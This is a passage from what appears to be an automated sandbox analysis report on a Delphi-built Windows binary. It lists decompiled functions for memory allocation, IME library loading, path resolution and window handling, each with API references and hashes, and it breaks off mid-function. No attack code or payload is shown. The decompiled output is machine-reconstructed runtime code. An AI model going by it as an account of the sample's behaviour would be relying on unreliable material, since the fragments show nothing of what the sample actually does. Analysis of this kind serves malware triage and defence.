                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                                                • String ID:
                                                                                • API String ID: 2796650324-0
                                                                                • Opcode ID: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                                • Instruction ID: eb3007f67f035d8ae6987e39c34b1bfc81debd44418eda91f1e8b5ec37918a95
                                                                                • Opcode Fuzzy Hash: 3d2362743f924f875b5a350bdc77fee5870a8126f4c59cb65ab49357851bb911
                                                                                • Instruction Fuzzy Hash: 7AE03971A006188BCB10DE6888C1A973398AB08754F4006A6AD54EF386D374D9108F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00401724(signed int __eax, void** __ecx, intOrPtr __edx) {
                                                                                				signed int _v20;
                                                                                				void** _v24;
                                                                                				void* _t15;
                                                                                				void** _t16;
                                                                                				void* _t17;
                                                                                				signed int _t27;
                                                                                				intOrPtr* _t29;
                                                                                				void* _t31;
                                                                                				intOrPtr* _t32;
                                                                                
                                                                                				_v24 = __ecx;
                                                                                				 *_t32 = __edx;
                                                                                				_t31 = __eax & 0xfffff000;
                                                                                				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
                                                                                				 *_v24 = _t31;
                                                                                				_t15 = _v20 - _t31;
                                                                                				_v24[1] = _t15;
                                                                                				_t29 =  *0x4875e4; // 0x70c354
                                                                                				while(_t29 != 0x4875e4) {
                                                                                					_t17 =  *(_t29 + 8);
                                                                                					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
                                                                                					if(_t31 > _t17) {
                                                                                						_t17 = _t31;
                                                                                					}
                                                                                					if(_t27 > _v20) {
                                                                                						_t27 = _v20;
                                                                                					}
                                                                                					if(_t27 > _t17) {
                                                                                						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
                                                                                						if(_t15 == 0) {
                                                                                							_t16 = _v24;
                                                                                							 *_t16 = 0;
                                                                                							return _t16;
                                                                                						}
                                                                                					}
                                                                                					_t29 =  *_t29;
                                                                                				}
                                                                                				return _t15;
                                                                                			}













                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401791
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: dd8d32f79d6d1f06e15ecb6ac7b9d7952d5c6991f51ac8b21c726be03388b82c
                                                                                • Instruction ID: 1a5925291fe787c1d48d88209c3eaa4d58d595cd838ba54473f015ce8f777fb7
                                                                                • Opcode Fuzzy Hash: dd8d32f79d6d1f06e15ecb6ac7b9d7952d5c6991f51ac8b21c726be03388b82c
                                                                                • Instruction Fuzzy Hash: 57117C7AA046019FC3109F29C980A1BB7E5EFC4760F15C63EE598A73A5D639AC408B89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041C940(intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* _t14;
                                                                                				void _t15;
                                                                                				intOrPtr _t25;
                                                                                				char* _t26;
                                                                                				void* _t35;
                                                                                
                                                                                				if( *0x487a20 == 0) {
                                                                                					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
                                                                                					_t35 = _t14;
                                                                                					_t15 =  *0x487a1c; // 0x2390000
                                                                                					 *_t35 = _t15;
                                                                                					_t1 = _t35 + 4; // 0x4
                                                                                					E00402994(0x46b4bc, 2, _t1);
                                                                                					_t2 = _t35 + 5; // 0x5
                                                                                					 *((intOrPtr*)(_t35 + 6)) = E0041C938(_t2, E0041C918);
                                                                                					_t4 = _t35 + 0xa; // 0xa
                                                                                					_t26 = _t4;
                                                                                					do {
                                                                                						 *_t26 = 0xe8;
                                                                                						_t5 = _t35 + 4; // 0x4
                                                                                						 *((intOrPtr*)(_t26 + 1)) = E0041C938(_t26, _t5);
                                                                                						 *((intOrPtr*)(_t26 + 5)) =  *0x487a20;
                                                                                						 *0x487a20 = _t26;
                                                                                						_t26 = _t26 + 0xd;
                                                                                					} while (_t26 - _t35 < 0xffc);
                                                                                					 *0x487a1c = _t35;
                                                                                				}
                                                                                				_t25 =  *0x487a20;
                                                                                				 *0x487a20 =  *((intOrPtr*)(_t25 + 5));
                                                                                				 *((intOrPtr*)(_t25 + 5)) = _a4;
                                                                                				 *((intOrPtr*)(_t25 + 9)) = _a8;
                                                                                				return  *0x487a20;
                                                                                			}









                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction ID: 28b28392519e15f92a9e572b18f021e7989893867b799864ec383581726918ff
                                                                                • Opcode Fuzzy Hash: fd37ab41c66d306ed9a3645466fdafa2f3b4ac451e8ff3ee91d89c6c74a99a38
                                                                                • Instruction Fuzzy Hash: B21136B42443059BD710DF19CCC1B86B7E4EB48390F20C93AE9999B786D378E9418BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Non-executed Functions

                                                                                C-Code - Quality: 83%
                                                                                			E004405C4() {
                                                                                				int _v8;
                                                                                				intOrPtr _t4;
                                                                                				struct HINSTANCE__* _t11;
                                                                                				struct HINSTANCE__* _t13;
                                                                                				struct HINSTANCE__* _t15;
                                                                                				struct HINSTANCE__* _t17;
                                                                                				struct HINSTANCE__* _t19;
                                                                                				struct HINSTANCE__* _t21;
                                                                                				struct HINSTANCE__* _t23;
                                                                                				struct HINSTANCE__* _t25;
                                                                                				struct HINSTANCE__* _t27;
                                                                                				struct HINSTANCE__* _t29;
                                                                                				intOrPtr _t40;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t44;
                                                                                
                                                                                				_t42 = _t44;
                                                                                				_t4 =  *0x486dd0; // 0x4877f0
                                                                                				if( *((char*)(_t4 + 0xc)) == 0) {
                                                                                					return _t4;
                                                                                				} else {
                                                                                					_v8 = SetErrorMode(0x8000);
                                                                                					_push(_t42);
                                                                                					_push(0x44072a);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t44;
                                                                                					if( *0x487bb8 == 0) {
                                                                                						 *0x487bb8 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
                                                                                					}
                                                                                					if( *0x46b9fc == 0) {
                                                                                						 *0x46b9fc = LoadLibraryA("IMM32.DLL");
                                                                                						if( *0x46b9fc != 0) {
                                                                                							_t11 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bbc = GetProcAddress(_t11, "ImmGetContext");
                                                                                							_t13 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bc0 = GetProcAddress(_t13, "ImmReleaseContext");
                                                                                							_t15 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bc4 = GetProcAddress(_t15, "ImmGetConversionStatus");
                                                                                							_t17 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bc8 = GetProcAddress(_t17, "ImmSetConversionStatus");
                                                                                							_t19 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bcc = GetProcAddress(_t19, "ImmSetOpenStatus");
                                                                                							_t21 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bd0 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                                                                                							_t23 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bd4 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                                                                                							_t25 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bd8 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                                                                                							_t27 =  *0x46b9fc; // 0x0
                                                                                							 *0x487bdc = GetProcAddress(_t27, "ImmIsIME");
                                                                                							_t29 =  *0x46b9fc; // 0x0
                                                                                							 *0x487be0 = GetProcAddress(_t29, "ImmNotifyIME");
                                                                                						}
                                                                                					}
                                                                                					_pop(_t40);
                                                                                					 *[fs:eax] = _t40;
                                                                                					_push(0x440731);
                                                                                					return SetErrorMode(_v8);
                                                                                				}
                                                                                			}



















                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                • LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                • SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                • String ID: IMM32.DLL$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME
                                                                                • API String ID: 3397921170-3271328588
                                                                                • Opcode ID: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction ID: 0cf64c75a47a1564bac7c0c751d74d83d05284642008fa8f65c16265756f8fe4
                                                                                • Opcode Fuzzy Hash: a215f9482aca3cc701cffad9bd2f85d0981100ccb56e893b3e39329e0a459fdd
                                                                                • Instruction Fuzzy Hash: A83125F1E453406EE700EB66EC56A1A37A8E704714B21C83FF601D7292D7BCA8649F9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 53%
                                                                                			E00405AC0(char* __eax, intOrPtr __edx) {
                                                                                				char* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				struct _WIN32_FIND_DATAA _v334;
                                                                                				char _v595;
                                                                                				void* _t45;
                                                                                				char* _t54;
                                                                                				char* _t64;
                                                                                				void* _t83;
                                                                                				intOrPtr* _t84;
                                                                                				char* _t90;
                                                                                				struct HINSTANCE__* _t91;
                                                                                				char* _t93;
                                                                                				void* _t94;
                                                                                				char* _t95;
                                                                                				void* _t96;
                                                                                
                                                                                				_v12 = __edx;
                                                                                				_v8 = __eax;
                                                                                				_v16 = _v8;
                                                                                				_t91 = GetModuleHandleA("kernel32.dll");
                                                                                				if(_t91 == 0) {
                                                                                					L4:
                                                                                					if( *_v8 != 0x5c) {
                                                                                						_t93 = _v8 + 2;
                                                                                						goto L10;
                                                                                					} else {
                                                                                						if( *((char*)(_v8 + 1)) == 0x5c) {
                                                                                							_t95 = E00405AAC(_v8 + 2);
                                                                                							if( *_t95 != 0) {
                                                                                								_t14 = _t95 + 1; // 0x1
                                                                                								_t93 = E00405AAC(_t14);
                                                                                								if( *_t93 != 0) {
                                                                                									L10:
                                                                                									_t83 = _t93 - _v8;
                                                                                									_push(_t83 + 1);
                                                                                									_push(_v8);
                                                                                									_push( &_v595);
                                                                                									L00401310();
                                                                                									while( *_t93 != 0) {
                                                                                										_t90 = E00405AAC(_t93 + 1);
                                                                                										_t45 = _t90 - _t93;
                                                                                										if(_t45 + _t83 + 1 <= 0x105) {
                                                                                											_push(_t45 + 1);
                                                                                											_push(_t93);
                                                                                											_push( &(( &_v595)[_t83]));
                                                                                											L00401310();
                                                                                											_t94 = FindFirstFileA( &_v595,  &_v334);
                                                                                											if(_t94 != 0xffffffff) {
                                                                                												FindClose(_t94);
                                                                                												_t54 =  &(_v334.cFileName);
                                                                                												_push(_t54);
                                                                                												L00401318();
                                                                                												if(_t54 + _t83 + 1 + 1 <= 0x105) {
                                                                                													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
                                                                                													_push(0x105 - _t83 - 1);
                                                                                													_push( &(_v334.cFileName));
                                                                                													_push( &(( &(( &_v595)[_t83]))[1]));
                                                                                													L00401310();
                                                                                													_t64 =  &(_v334.cFileName);
                                                                                													_push(_t64);
                                                                                													L00401318();
                                                                                													_t83 = _t83 + _t64 + 1;
                                                                                													_t93 = _t90;
                                                                                													continue;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										goto L17;
                                                                                									}
                                                                                									_push(_v12);
                                                                                									_push( &_v595);
                                                                                									_push(_v8);
                                                                                									L00401310();
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
                                                                                					if(_t84 == 0) {
                                                                                						goto L4;
                                                                                					} else {
                                                                                						_push(0x105);
                                                                                						_push( &_v595);
                                                                                						_push(_v8);
                                                                                						if( *_t84() == 0) {
                                                                                							goto L4;
                                                                                						} else {
                                                                                							_push(_v12);
                                                                                							_push( &_v595);
                                                                                							_push(_v8);
                                                                                							L00401310();
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L17:
                                                                                				return _v16;
                                                                                			}




















                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405ADD
                                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405AEE
                                                                                • lstrcpyn.KERNEL32(?,?,?,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B1E
                                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405B82
                                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001), ref: 00405BB7
                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D), ref: 00405BCA
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000), ref: 00405BD7
                                                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20), ref: 00405BE3
                                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C17
                                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C23
                                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                • API String ID: 3245196872-1565342463
                                                                                • Opcode ID: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction ID: 296a13db2414833b3bf80d2bdfa437c82c634a9cd7f8270e4b53d567bb21fe4a
                                                                                • Opcode Fuzzy Hash: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction Fuzzy Hash: BD416072900619ABEB10DAA8CC85EDFB7EDDF44314F1405B7B949F7281D638AE408F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 83%
                                                                                			E00451994(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				char _v12;
                                                                                				intOrPtr _t149;
                                                                                				intOrPtr _t154;
                                                                                				intOrPtr _t155;
                                                                                				intOrPtr _t160;
                                                                                				intOrPtr _t162;
                                                                                				intOrPtr _t163;
                                                                                				void* _t165;
                                                                                				struct HWND__* _t166;
                                                                                				long _t176;
                                                                                				signed int _t198;
                                                                                				signed int _t199;
                                                                                				long _t220;
                                                                                				intOrPtr _t226;
                                                                                				int _t231;
                                                                                				intOrPtr _t232;
                                                                                				intOrPtr _t241;
                                                                                				intOrPtr _t245;
                                                                                				signed int _t248;
                                                                                				intOrPtr _t251;
                                                                                				intOrPtr _t252;
                                                                                				signed int _t258;
                                                                                				long _t259;
                                                                                				intOrPtr _t262;
                                                                                				intOrPtr _t266;
                                                                                				signed int _t269;
                                                                                				intOrPtr _t270;
                                                                                				intOrPtr _t271;
                                                                                				signed int _t277;
                                                                                				long _t278;
                                                                                				intOrPtr _t281;
                                                                                				signed int _t286;
                                                                                				signed int _t287;
                                                                                				long _t290;
                                                                                				intOrPtr _t294;
                                                                                				struct HWND__* _t299;
                                                                                				signed int _t301;
                                                                                				signed int _t302;
                                                                                				signed int _t305;
                                                                                				signed int _t307;
                                                                                				long _t308;
                                                                                				signed int _t311;
                                                                                				signed int _t313;
                                                                                				long _t314;
                                                                                				signed int _t317;
                                                                                				signed int _t318;
                                                                                				signed int _t326;
                                                                                				long _t328;
                                                                                				intOrPtr _t331;
                                                                                				intOrPtr _t362;
                                                                                				long _t370;
                                                                                				void* _t372;
                                                                                				void* _t373;
                                                                                				intOrPtr _t374;
                                                                                
                                                                                				_t372 = _t373;
                                                                                				_t374 = _t373 + 0xfffffff8;
                                                                                				_v12 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t372);
                                                                                				_push(0x451efe);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t374;
                                                                                				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
                                                                                					_t294 =  *0x486dc0; // 0x41cc74
                                                                                					E00406520(_t294,  &_v12);
                                                                                					E0040A0B0(_v12, 1);
                                                                                					E00403D80();
                                                                                				}
                                                                                				_t149 =  *0x487bfc; // 0x2291310
                                                                                				E00455F6C(_t149);
                                                                                				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
                                                                                				_push(_t372);
                                                                                				_push(0x451ee1);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t374;
                                                                                				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
                                                                                					_t155 = _v8;
                                                                                					_t378 =  *((char*)(_t155 + 0x1a6));
                                                                                					if( *((char*)(_t155 + 0x1a6)) == 0) {
                                                                                						_push(_t372);
                                                                                						_push(0x451de8);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t374;
                                                                                						E004037B0(_v8, __eflags);
                                                                                						 *[fs:eax] = 0;
                                                                                						_t160 =  *0x487c00; // 0x2290f1c
                                                                                						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
                                                                                						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
                                                                                							__eflags = 0;
                                                                                							E00450B80(_v8, 0);
                                                                                						}
                                                                                						_t162 = _v8;
                                                                                						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
                                                                                						if( *((char*)(_t162 + 0x22f)) != 1) {
                                                                                							_t163 = _v8;
                                                                                							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
                                                                                							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
                                                                                								_t299 = 0;
                                                                                								_t165 = E0043BD14(_v8);
                                                                                								_t166 = GetActiveWindow();
                                                                                								__eflags = _t165 - _t166;
                                                                                								if(_t165 == _t166) {
                                                                                									_t176 = IsIconic(E0043BD14(_v8));
                                                                                									__eflags = _t176;
                                                                                									if(_t176 == 0) {
                                                                                										_t299 = E0044C7E0(E0043BD14(_v8));
                                                                                									}
                                                                                								}
                                                                                								__eflags = _t299;
                                                                                								if(_t299 == 0) {
                                                                                									ShowWindow(E0043BD14(_v8), 0);
                                                                                								} else {
                                                                                									SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                									SetActiveWindow(_t299);
                                                                                								}
                                                                                							} else {
                                                                                								SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
                                                                                							}
                                                                                						} else {
                                                                                							E00439390(_v8);
                                                                                						}
                                                                                					} else {
                                                                                						_push(_t372);
                                                                                						_push(0x451a4c);
                                                                                						_push( *[fs:eax]);
                                                                                						 *[fs:eax] = _t374;
                                                                                						E004037B0(_v8, _t378);
                                                                                						 *[fs:eax] = 0;
                                                                                						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                							if( *((char*)(_v8 + 0x22f)) != 1) {
                                                                                								_t301 = E004531C4() -  *(_v8 + 0x48);
                                                                                								__eflags = _t301;
                                                                                								_t302 = _t301 >> 1;
                                                                                								if(_t301 < 0) {
                                                                                									asm("adc ebx, 0x0");
                                                                                								}
                                                                                								_t198 = E004531B8() -  *(_v8 + 0x4c);
                                                                                								__eflags = _t198;
                                                                                								_t199 = _t198 >> 1;
                                                                                								if(_t198 < 0) {
                                                                                									asm("adc eax, 0x0");
                                                                                								}
                                                                                							} else {
                                                                                								_t241 =  *0x487bfc; // 0x2291310
                                                                                								_t305 = E004350A4( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
                                                                                								_t302 = _t305 >> 1;
                                                                                								if(_t305 < 0) {
                                                                                									asm("adc ebx, 0x0");
                                                                                								}
                                                                                								_t245 =  *0x487bfc; // 0x2291310
                                                                                								_t248 = E004350E8( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
                                                                                								_t199 = _t248 >> 1;
                                                                                								if(_t248 < 0) {
                                                                                									asm("adc eax, 0x0");
                                                                                								}
                                                                                							}
                                                                                							if(_t302 < 0) {
                                                                                								_t302 = 0;
                                                                                							}
                                                                                							if(_t199 < 0) {
                                                                                								_t199 = 0;
                                                                                							}
                                                                                							_t326 = _t199;
                                                                                							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                							if( *((char*)(_v8 + 0x57)) != 0) {
                                                                                								E0044FE34(_v8, _t326);
                                                                                							}
                                                                                						} else {
                                                                                							_t251 =  *((intOrPtr*)(_v8 + 0x230));
                                                                                							__eflags = _t251 + 0xfa - 2;
                                                                                							if(_t251 + 0xfa - 2 >= 0) {
                                                                                								__eflags = _t251 - 5;
                                                                                								if(_t251 == 5) {
                                                                                									_t252 = _v8;
                                                                                									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
                                                                                									if( *((char*)(_t252 + 0x22f)) != 1) {
                                                                                										_t307 = E004531F4() -  *(_v8 + 0x48);
                                                                                										__eflags = _t307;
                                                                                										_t308 = _t307 >> 1;
                                                                                										if(_t307 < 0) {
                                                                                											asm("adc ebx, 0x0");
                                                                                										}
                                                                                										_t258 = E004531E8() -  *(_v8 + 0x4c);
                                                                                										__eflags = _t258;
                                                                                										_t259 = _t258 >> 1;
                                                                                										if(_t258 < 0) {
                                                                                											asm("adc eax, 0x0");
                                                                                										}
                                                                                									} else {
                                                                                										_t262 =  *0x487bfc; // 0x2291310
                                                                                										_t311 = E004350A4( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
                                                                                										__eflags = _t311;
                                                                                										_t308 = _t311 >> 1;
                                                                                										if(_t311 < 0) {
                                                                                											asm("adc ebx, 0x0");
                                                                                										}
                                                                                										_t266 =  *0x487bfc; // 0x2291310
                                                                                										_t269 = E004350E8( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
                                                                                										__eflags = _t269;
                                                                                										_t259 = _t269 >> 1;
                                                                                										if(_t269 < 0) {
                                                                                											asm("adc eax, 0x0");
                                                                                										}
                                                                                									}
                                                                                									__eflags = _t308;
                                                                                									if(_t308 < 0) {
                                                                                										_t308 = 0;
                                                                                										__eflags = 0;
                                                                                									}
                                                                                									__eflags = _t259;
                                                                                									if(_t259 < 0) {
                                                                                										_t259 = 0;
                                                                                										__eflags = 0;
                                                                                									}
                                                                                									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
                                                                                								}
                                                                                							} else {
                                                                                								_t270 =  *0x487bfc; // 0x2291310
                                                                                								_t370 =  *(_t270 + 0x44);
                                                                                								_t271 = _v8;
                                                                                								__eflags =  *((char*)(_t271 + 0x230)) - 7;
                                                                                								if( *((char*)(_t271 + 0x230)) == 7) {
                                                                                									_t362 =  *0x44b170; // 0x44b1bc
                                                                                									_t290 = E00403740( *(_v8 + 4), _t362);
                                                                                									__eflags = _t290;
                                                                                									if(_t290 != 0) {
                                                                                										_t370 =  *(_v8 + 4);
                                                                                									}
                                                                                								}
                                                                                								__eflags = _t370;
                                                                                								if(_t370 == 0) {
                                                                                									_t313 = E004531C4() -  *(_v8 + 0x48);
                                                                                									__eflags = _t313;
                                                                                									_t314 = _t313 >> 1;
                                                                                									if(_t313 < 0) {
                                                                                										asm("adc ebx, 0x0");
                                                                                									}
                                                                                									_t277 = E004531B8() -  *(_v8 + 0x4c);
                                                                                									__eflags = _t277;
                                                                                									_t278 = _t277 >> 1;
                                                                                									if(_t277 < 0) {
                                                                                										asm("adc eax, 0x0");
                                                                                									}
                                                                                								} else {
                                                                                									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
                                                                                									__eflags = _t317;
                                                                                									_t318 = _t317 >> 1;
                                                                                									if(_t317 < 0) {
                                                                                										asm("adc ebx, 0x0");
                                                                                									}
                                                                                									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
                                                                                									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
